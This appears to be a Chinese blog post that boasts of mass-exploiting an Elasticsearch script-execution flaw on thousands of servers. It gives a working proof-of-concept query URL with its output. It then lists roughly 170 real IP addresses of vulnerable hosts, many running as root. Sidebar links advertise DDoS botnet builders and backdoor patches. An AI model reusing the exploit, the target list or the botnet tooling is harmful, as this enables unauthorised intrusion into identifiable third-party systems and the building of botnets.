25000linux集群危机怎么样,我是如何在2小时内组建"5000+集群服务器僵尸网络"的

于 2021-05-17 00:04:15 发布
阅读量6.7k 收藏
点赞数
文章标签: 25000linux集群危机怎么样

由于Elasticsearch命令执行漏洞,导致上万服务器受影响,截图所有ip无重复。2小时之内顺利在5000多台服务器上执行相关命令。

imgpxy.php?url=gnp.789391542290804102%2F8041_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

本次仅是技术测试漏洞影响范围,标题党了。国内测试700台集群服务器,成功了170多台。所有测试当中仅测试了1.4w ip成功率接近50%.漏洞证明:

执行POC:http://xx.xx.xx.xx:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22String%20str%3DSystem.getProperty(\%22os.name\%22)%2b\%22-\%22%2bSystem.getProperty(\%22user.name\%22);\%22[os:\%22%2bstr.toString()%2b\%22/]\%22;%22}}}

结果如下:

imgpxy.php?url=gnp.956991542290804102%2F8041_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

{"took":7,"timed_out":false,"_shards":{"total":5,"successful":5,"failed":0},"hits":{"total":140847,"max_score":1.0,"hits":[{"_index":"cai","_type":"loganalysis","_id":"f2bb7c30-ab55-11e3-9940-22000a9a8b23","_score":1.0,"fields":{"exp":"[os:Linux-ec2-user/]"}}]}}

返回了当前操作系统类型和当前用户运行Elasticsearch的用户名。

国内受影响IP:114.112.172.45:Linux-elasticsearch

60.190.240.74:Linux-admin

218.247.15.110:Linux-root

119.254.106.156:Linux-root

112.124.6.156:Linux-root

112.65.228.5:Linux-yxtuser

112.124.68.214:Linux-root

183.129.178.138:Linux-admin

123.127.114.28:Linux-root

123.127.114.32:Linux-root

114.113.156.235:Linux-root

210.26.182.133:Windows Server 2008 R2-tlm

183.60.244.17:Linux-admin

124.248.40.56:Linux-elasticsearch

115.29.160.208:Linux-elasticsearch

222.180.136.70:Linux-logbase

123.125.105.198:Linux-root

59.175.153.24:Linux-root

210.14.154.135:Linux-yada

118.186.12.154:Linux-root

219.232.240.226:Linux-spider

210.34.4.113:Linux-neversion

59.175.153.28:Linux-root

115.29.221.214:Linux-root

202.204.32.142:Windows Server 2008-Administrator

42.96.147.212:Linux-elasticsearch

210.192.125.137:Linux-elasticsearch

114.80.158.118:Linux-webuser

121.192.191.166:Linux-neversion

166.111.135.27:Linux-elasticsearch

219.223.190.244:Linux-root

42.62.26.149:Linux-elasticsearch

101.251.193.21:Linux-root

218.200.15.238:Linux-root

115.28.42.126:Linux-elasticsearch

113.107.226.170:Linux-root

218.205.65.249:Linux-admin

210.14.137.102:Linux-elasticsearch

111.11.197.146:Linux-root

117.27.143.230:Linux-dev

42.96.194.176:Linux-root

115.29.188.127:Linux-elasticsearch

115.29.145.164:Linux-elasticsearch

210.26.182.134:Windows Server 2008 R2-tlm

112.124.68.10:Linux-root

210.192.125.141:Linux-elasticsearch

101.251.193.22:Linux-root

202.91.235.47:Linux-doit

180.153.154.140:Linux-elasticsearch

115.28.151.48:Linux-tomcat7

218.108.129.141:Linux-www

219.140.191.206:Linux-root

210.14.154.136:Linux-yada

203.195.193.90:Linux-elasticsearch

61.164.118.194:Linux-root

60.190.1.83:Windows Server 2008 R2-WIN-AR35FQEMOPC$

202.194.7.250:Linux-root

221.6.207.222:Linux-mota

219.136.249.94:Linux-elasticsearch

121.199.19.79:Linux-elasticsearch

210.5.152.69:Linux-elasticsearch

61.152.123.139:Linux-root

115.29.32.56:Linux-root

121.52.229.225:Linux-root

122.224.243.172:Windows Server 2008 R2-IWEB12$

222.192.61.8:Windows Server 2008 R2-WIN-KFLPLV06RH2$

180.153.177.169:Windows Server 2008 R2-Administrator

202.114.177.32:Linux-elasticsearch

211.153.33.201:FreeBSD-root

103.29.133.165:Linux-admin

211.155.229.2:Linux-doit

42.159.7.88:Linux-elasticsearch

202.192.149.91:Linux-elasticsearch

123.150.207.181:Linux-elasticsearch

202.197.77.3:Linux-root

114.80.158.119:Linux-webuser

220.231.128.242:Linux-root

114.80.158.117:Linux-webuser

59.175.153.94:Linux-root

124.207.188.72:Linux-elasticsearch

121.52.232.27:Linux-admin

202.99.230.148:Linux-elasticsearch

210.32.158.117:Windows Server 2008-Administrator

121.52.213.92:Linux-tankai

222.192.61.9:Windows Server 2008 R2-WIN-FBH6CANACHV$

175.102.33.122:Linux-root

211.155.86.118:Linux-elasticsearch

61.164.112.9:Linux-root

210.73.221.26:Linux-elasticsearch

124.127.201.53:Windows Server 2008 R2-Administrator

118.193.128.202:Linux-root

59.151.86.9:Windows Server 2008 R2-cobazaaradmin

202.192.149.90:Linux-elasticsearch

123.101.0.77:Linux-es

218.94.42.3:Windows 2003-SYSTEM

125.210.209.154:Linux-ec

58.215.139.124:Linux-root

121.199.41.168:Linux-site

60.194.51.18:Linux-elasticsearch

210.51.190.22:Linux-root

180.153.224.122:Linux-root

119.2.0.195:Linux-wubin

166.111.7.105:Linux-aminer

42.96.168.215:Linux-medium

218.108.28.133:Linux-root

121.199.31.235:Linux-elasticsearch

124.207.188.106:Linux-elasticsearch

112.124.103.71:Linux-elasticsearch

121.199.14.195:Linux-elasticsearch

183.129.160.157:Linux-root

59.61.77.4:Linux-elasticsearch

124.95.161.235:Linux-elasticsearch

183.63.149.105:Linux-elasticsearch

118.122.124.188:Linux-elasticsearch

223.4.146.165:Windows Server 2008 R2-WHZD011249$

210.34.4.74:Linux-badboy

202.197.77.1:Linux-root

124.207.188.104:Linux-elasticsearch

218.17.162.90:Windows 2003-SYSTEM

124.248.40.55:Linux-elasticsearch

59.175.153.37:Linux-root

42.62.30.204:Linux-elasticsearch

121.194.2.202:Linux-elasticsearch

62.141.60.253:Linux-elasticsearch

59.106.177.123:Linux-elasticsearch

85.158.182.229:Linux-elasticsearch

162.243.52.4:Linux-elasticsearch

50.97.245.37:Linux-data

192.3.17.46:Linux-root

46.252.21.82:Linux-elasticsearch

95.128.179.92:Linux-elasticsearch

54.199.202.180:Linux-elasticsearch

54.72.186.95:Linux-elasticsearch

184.69.206.134:Linux-elasticsearch

107.170.149.193:Linux-elasticsearch

138.91.191.171:Windows Server 2012-ECOSEARCH$

77.120.101.131:Linux-elasticsearch

95.85.30.247:Linux-elasticsearch

62.210.239.230:Linux-elasticsearch

23.253.35.234:Linux-elasticsearch

85.25.100.198:Linux-elasticsearch

162.243.6.243:Linux-elasticsearch

115.28.153.62:Linux-ringtone

82.95.165.31:Linux-elasticsearch

54.204.149.163:Linux-elasticsearch

206.221.150.100:Linux-elasticsearch

218.241.236.109:Linux-lda

199.80.52.216:Linux-elasticsearch

62.210.215.14:Linux-elasticsearch

46.36.216.71:Linux-elasticsearch

54.255.38.134:Linux-deploy

54.72.78.222:Linux-elasticsearch

162.242.241.223:Linux-elasticsearch

54.251.248.168:Linux-elasticsearch

217.67.30.84:FreeBSD-elasticsearch

89.31.96.201:Linux-elasticsearch

151.236.216.20:Linux-elasticsearch

95.142.163.212:Linux-elasticsearch

23.253.125.187:Linux-elasticsearch

208.94.234.177:Linux-elasticsearch

162.243.37.251:Linux-elasticsearch

178.33.253.101:Linux-julien

178.211.56.101:Windows Server 2008 R2-WIN-ROLMAN9Q7K6$

107.178.214.245:Linux-elasticsearch

46.252.21.183:Linux-elasticsearch

78.140.183.200:SunOS-root

153.121.43.197:Linux-elasticsearch

54.72.222.1:Linux-elasticsearch

162.13.184.118:Linux-elasticsearch

178.170.104.38:Linux-elasticsearch

54.221.61.224:Linux-elasticsearch

54.196.20.198:Linux-elasticsearch

23.253.170.86:Linux-elasticsearch

94.23.222.203:Linux-root

修复方案:

限制ip访问

weixin_39746241
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
25000linux集群源码,一文看懂 Redis5 搭建集群
weixin_29536515的博客
05-14 634
1、简要说明2018年十月 Redis 发布了稳定版本的 5.0 版本,推出了各种新特性,其中一点是放弃 Ruby的集群方式,改为 使用 C语言编写的 redis-cli的方式,是集群的构建方式复杂度大大降低。关于集群的更新可以在 Redis5 的版本说明中看到,如下:The cluster manager was ported from Ruby (redis-trib.rb) to C cod...
25000 linuxddos去后门优化版集群_Ambari 支持多集群管理
weixin_34051133的博客
12-26 957
注意:本文使用的版本是 Ambari 2.7.4/ 场景 /在使用Ambari的时候,它本身默认是只能管理一个集群的。这在实际使用的时候,会比较不方便,尤其是如果用来管理ElasticSearch,Redis一类的集群时,因为集群数量多,就更加捉襟见肘了。而如果想要管理多个集群,要么就付费使用Clouder Manager企业版,这个是支持多集群管理的;或者就一个集群对应一个Ambari...
25000Linux集群+去后门补丁+vc补丁
08-02
这是别人放出来的正版25000集群 不用说又是跟36000一样放出来收后门量的 现在还少有人手里有,有也是后门 别人笑我太疯癫,我笑他人看不穿。都不用去想后门货 测试了确实是正版25000的主控和Linux小马当然也带后门 生成器上面带的后门域名无法直接去掉 通过运行内存补丁生成小马可以直接0填充掉后门地址 SS无法查到连接,域名解析到127.0.0.1的 只有等到解析到IP地址的时候连接才会出来 后门域名 www.2xpk.com 解析地址是 127.0.0.1 切记 切记 切记 切记 切记 切记 切记 一定要先运行补丁,补丁呼出的生成器生成的小马才没有后门 直接点生成器生成的小马有后门 还有2个马是一模一样的,作者就是脱了裤子放屁,无需纠结
集群、限流、缓存 BAT 大厂无非也就是这么做
不是太高的手的专栏
08-29 165
点击▲关注 “爪哇笔记” 给公众号标星置顶更多精彩 第一时间直达前言前阵子有网友询问,如何优化网站?这个问题真的很大,跟他简单的聊了一下,随便说了几点,觉得有必要整理...
集群教程
05-13 257
http://redisdoc.com/topic/cluster-tutorial.html
安装大型Linux集群,第2部分:配置管理服务器和安装节点
02-20
这个系列包含多个部分,本文是其中的第2部分,阐述了如何配置集群中的管理服务器以及如何安装节点。本文是系列文章中的第2部分,该系列涵盖了安装和设置一个大型Linux计算机集群的全部内容。有关如何从多个独立的...
Linux服务器集群详细配置【简介+分类+配置】.docx
最新发布
09-18
例如,为WEB服务建立高可用和负载均衡集群,我们需要四台Redhat Enterprise Linux 5服务器,两台作为WEB服务器(node1和node2),一台作为集群分配服务器(master),另一台作为备份服务器(slave)。配置步骤包括:...
Linux服务器集群系统
01-30
本文介绍了Linux服务器集群系统――LVS(LinuxVirtual Server)项目的产生背景和目标,并描述了LVS服务器集群框架及目前提供的软件,列举LVS集群系统的特点和一些实际应用,最后,本文谈论了LVS项目的开发进展和开发...
linux集群
qq_37369726的博客
06-05 299
在两台机器上安装keepalived: yum install -y keepalived keepalived+nginx实现web高可用: vip:虚拟ip,当master宕机后,vip被分配到backup上。 编辑160主机的keepalived配置文件: vim /etc/keepalived/keepalived.conf global_defs { notification_...
25000Linux集群去后门+防K复活
12-10
25000Linux集群去后门+防K复活
25000去后门补丁,25000无壳正版集群,36000带生成器
06-03
36000集群 36000linux集群 软件去后门 百度云36000破解 阿布36000集群 36000linux集群 36000集群 教程 36000集群3.0 25000带生成器 36000集群的小马 36000集群源码 36000集群去后门教程 25000正版Linux集群去后门带生成器 25000集群附去后门生成器 25000正版生成器 25000去后门补丁 25000去后门内存补丁 25000无壳正版集群
正版25000Liunx集群去后门破解版
06-03
25000正版Linux集群去后门带生成器,36000集群3.0,25000linux去后门
25000Linux集群完整版去后门生成器.rar
10-11
25000Linux集群完整版去后门生成器
25000-36000集群
01-13
无后门的不好找啊我在这里发给大家玩玩吧 如果发现后门可以举报我来
linux25000去后门完整端
10-27
linux25000去后门完整端内带说明
Linux服务器集群系统LVS:构建高性能集群解决方案
Linux服务器集群系统,尤其是LVS(Linux Virtual Server),在当前以网络为中心的计算时代扮演着关键角色。随着互联网的飞速发展,客户/服务器计算模式已经成为主流,而Web服务的繁荣更是推动了这种模式的广泛应用。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值